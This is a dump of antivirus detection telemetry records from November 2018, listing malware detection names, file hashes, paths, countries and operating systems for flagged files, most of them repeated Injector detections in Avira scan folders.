  Row(detection=Row(filename='6a7a47bd21a3ad8ef62f944550200118f797c909eee32087f2005f096340bc19', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\6A7A47BD21A3AD8EF62F944550200118F797C909EEE32087F2005F096340BC19', filesize=640000, name='TR/AD.NetWiredRc.hrjcx.#M1.#R1'), hash='6a7a47bd21a3ad8ef62f944550200118f797c909eee32087f2005f096340bc19', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:02:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cughxlcm.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\CUGHxlcm.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145142-f2d5a1d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-145142-F2D5A1D1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.078\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.078\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T05:30:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-073051-b5d32ffa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e5507ae\\AVSCAN-20181102-072706-82C0C513\\AVSCAN-20181102-073051-B5D32FFA', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:30:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050400-ae195448', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050400-AE195448', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055355-a7371901', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055355-A7371901', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051443-2d870194', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051443-2D870194', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053656-48348f7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053656-48348F7E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061853-24697616', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061853-24697616', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060529-455c4af3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060529-455C4AF3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053502-03f071a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053502-03F071A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060811-a591092e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060811-A591092E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054907-fbae8ec5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054907-FBAE8EC5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052350-73aabc9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052350-73AABC9B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053615-2fdd7418', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053615-2FDD7418', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055640-09b342cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055640-09B342CF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061753-00cd05dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061753-00CD05DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052405-7c9279b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052405-7C9279B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055038-321092e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055038-321092E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061750-fed2bf18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061750-FED2BF18', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060549-50ce92de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060549-50CE92DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062040-64189a75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062040-64189A75', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054053-d56977ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054053-D56977AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054539-7fed7e84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054539-7FED7E84', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055130-513dfa94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055130-513DFA94', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052144-289b5a79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052144-289B5A79', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060812-a68b93a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060812-A68B93A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061021-f35aa3ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061021-F35AA3EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052046-061ed9a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052046-061ED9A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054705-b2ed684f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054705-B2ED684F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055456-cbc16f27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055456-CBC16F27', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T18:51:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050655-16662ee9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050655-16662EE9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053412-e627df8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053412-E627DF8F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053533-1674f6fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053533-1674F6FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062119-7b4533d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062119-7B4533D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054106-dd33fbc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054106-DD33FBC3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054117-e369a73a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054117-E369A73A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055952-7c28ca6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055952-7C28CA6B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060012-88203857', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060012-88203857', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060153-c42acc33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060153-C42ACC33', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060716-84d20427', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060716-84D20427', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062403-dd2bc59a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062403-DD2BC59A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062426-eacde22c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062426-EACDE22C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053731-5cb091c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053731-5CB091C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:32:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050900-60e04aa5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050900-60E04AA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051320-fc4de51b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051320-FC4DE51B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054153-f93a31ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054153-F93A31BA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061002-e81ad9f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061002-E81AD9F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051229-ddb888bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051229-DDB888BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051150-c622c9e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051150-C622C9E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:48Z'), dt=datetime.date(2018, 11, 2)),
